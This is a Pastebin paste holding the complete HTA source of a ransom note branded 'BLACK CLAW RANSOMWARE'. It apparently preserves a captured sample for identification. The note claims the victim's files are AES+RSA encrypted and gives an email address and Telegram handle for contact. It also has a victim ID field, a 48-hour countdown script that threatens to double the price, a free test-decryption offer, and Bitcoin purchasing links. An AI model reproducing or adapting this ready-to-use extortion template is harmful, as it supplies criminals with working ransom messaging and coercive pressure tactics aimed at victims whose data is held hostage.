Demonslay335

RECOVER YOUR FILES.hta

May 25th, 2020
709
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>RECOVER YOUR FILES </title> <HTA:APPLICATION icon="#" WINDOWSTATE="maximize" SHOWINTASKBAR="yes" SYSMENU="no" CAPTION="no" scroll="no" /> <style> body { font-family: 'Lucida Console'; text-align: center; } .center { display: block; margin-left: auto; margin-right: auto; width: 200px; } b { font-family: 'Franklin Gothic Medium'; font-size: 30px; } .text { text-align: left; padding-left: 250px; } .highlight { background-color: #d8e5e8; resize:none; background-color:#e8f0f2; } code { font-weight: bold; font-size: 19px; } .alert { color: red; background-color: black; font-family: 'Franklin Gothic Medium'; font-size: 27px; padding-left: 20px; font-weight: bold; } .timer { color: red; background-color: black; font-family: 'Franklin Gothic Medium'; font-size: 60px; font-weight: bold; width: auto; } .pad { padding-left: 30px; } .titr { font-weight: bold; } .name { font-family: 'Arial Black'; } </style></head><body> <div class="content"> <div class="center"> <img src="https://i.ibb.co/RC2HjXH/b.jpg" width="200" height="200"> </div> <b>All your files have been encrypted! </b> <div style="padding-top:20px;" class="text"> <br> All your files have been encrypted (WITH AES+RSA) due to a security problem with your PC. If you want to restore them, write us an email and attach one of encrypted files(less than 1mb): <a class="highlight" href="mailto: [email protected]"> [email protected] </a> <br> or send a message to our telegram account: <a class="highlight" href="https:\\t.me\b_claw">T.me\B_Claw </a> <br> <br> in case of no anwser in 2 hours contact with us throught Telegram account <a class="highlight" href="https:\\t.me\b_claw">T.me\B_Claw </a> <br> <br> Include this id in your message or email:<br /> <textarea rows="7" cols="53" class="highlight">[redacted 10 lowercase alphanum]</textarea> <br> <br> </div> <a class="alert">YOU HAVE ONLY 48 HOURS TO CONTACT US. WHEN THIS TIME ENDS THE PRICE WILL BE TWICE AS MUCH </a> <br> <br> <p id="demo" class="timer">2d 0h 0m 0s </p> <script> var countDownDate = new Date("may. 13, 2020 23:40:03").getTime(); var x = setInterval(function () { var now = new Date().getTime(); var distance = countDownDate - now; var days = Math.floor(distance / (1000 * 60 * 60 * 24)); var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60)); var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60)); var seconds = Math.floor((distance % (1000 * 60)) / 1000); document.getElementById("demo").innerHTML = days + "d " + hours + "h " + minutes + "m " + seconds + "s "; if (distance < 0) { clearInterval(x); document.getElementById("demo").innerHTML = "EXPIRED! THE PRICE IS TWICE AS MUCH NOW"; } }, 1000); </script> <div style="margin-bottom:30px;" class="text"> <a class="titr"># Free decryption as guarantee </a> <br> <br> <div class="pad"> <a>Before paying you can send up to 1 file for free decryption. </a> </div> <br> <br> <a class="titr"># How to obtain Bitcoin </a> <br> <br> <div class="pad"> <a>The easiest way to buy Bitcoin in Localbitcoins.com website. </a> <br> <a href="https://localbitcoins.com/buy_bitcoins">https://localbitcoins.com/buy_bitcoins </a> <br> <br>Also you can find other places to buy Bitcoins and beginner guide here: <br> <a href="https://www.coindesk.com/learn/bitcoin-101/how-can-i-buy-bitcoins">https://www.coindesk.com/learn/bitcoin-101/how-can-i-buy-bitcoins </a> </div> <br> <br> <a class="titr"># ATTENTION !!! </a> <br> <br> <div class="pad"> <a>DO NOT RENAME THE FILES. </a> </div> </div> <a class="name">BLACK CLAW RANSOMWARE </a> </div></body></html>
Add Comment
Please, Sign In to add comment